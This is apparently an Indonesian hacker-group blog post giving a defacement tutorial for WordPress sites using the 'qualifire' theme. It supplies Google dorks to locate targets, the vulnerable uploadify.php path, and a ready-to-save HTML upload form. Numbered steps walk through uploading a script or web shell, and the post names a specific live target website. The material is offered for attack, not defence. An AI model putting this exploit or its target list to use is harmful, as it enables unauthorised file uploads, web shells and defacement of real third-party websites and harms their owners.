Wad00 Our Struggle Team
Hahahaha Ketemu ama gua nih Gord1
gw mau bagi tutorial deface yang mungkin udah banyak yang tau :v
Sesuai judul diatas Deface Wordpress Themes Qualifier :v
Bahan:
Dork: * inurl:"/wp-content/themes/qualifire"
* inurl:"/wp-content/themes/qualifire" site:co.li (pake otak bokep lu asw)
Kembangin dork nya ya masa dapet janda terus gk malu ama yg lain -_
Exploit: /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Csrf :
<form
action="http://target.co.li/wp-
content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
Copast di Notepad simpan dengan ekstensi .html
Tutorialnya :
1. Dorking di google pake dork diatas :)
2. Pilih targetnya terus masukan exploitnya sekaligus :)
Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
3. Kalo vuln akan blank putih kayak gini cuk !
4. Tinggal kopi link target terus masukin ke csrf dahh simpan pake ekstensi .html
5. upload script kalian klo gw upload script.txt kalo lg hoki sih bisa upload shell ;v
6. kalo berhasil nanti akan muncul angka 1
7. Aksesnya ? site.co.li/namascriptlu.coli
Done :)
Nihh gw kasih live target :http://www.architecte-rivalland.com
Sekian ya
Salam saya Gord1
Our Struggle Team
Hello, my name is Jack Sparrow. I'm a 50 year old self-employed Pirate from the Caribbean.
No comments:
Post a Comment